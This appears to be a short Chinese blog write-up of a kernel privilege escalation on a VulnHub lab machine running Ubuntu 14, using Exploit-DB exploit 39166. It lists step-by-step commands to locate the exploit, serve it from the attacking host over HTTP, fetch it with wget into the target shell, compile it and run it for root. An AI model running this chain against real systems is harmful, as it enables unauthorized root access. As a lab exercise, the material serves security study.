本文介绍了一种在VulnHub靶场环境中进行内核提权的方法。通过收集靶机版本信息,定位到Ubuntu 14版本的内核,并利用对应的内核漏洞进行提权操作。具体步骤包括搜索、下载、编译和执行exploit。
补充:
vulnhub靶场内核提权
通过信息收集获得靶机版本:
查找ubuntu 14*版本的内核漏洞:
使用Exploit:
searchsploit 39166 //在kali本地exploit库搜索
locate linux/local/39166.c //查看位置
cp /usr/share/exploitdb/exploits/linux/local/39166.c . //复制到指定目录
python -m SimpleHTTPServer 8081 // 在指定目录打开http服务
wget http://192.168.120.128:8081/39166.c //在shell 里面下载exp
gcc 39166.c -o 39166 //编译exp
./39166 //执行exp可执行文件
成功提权。
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
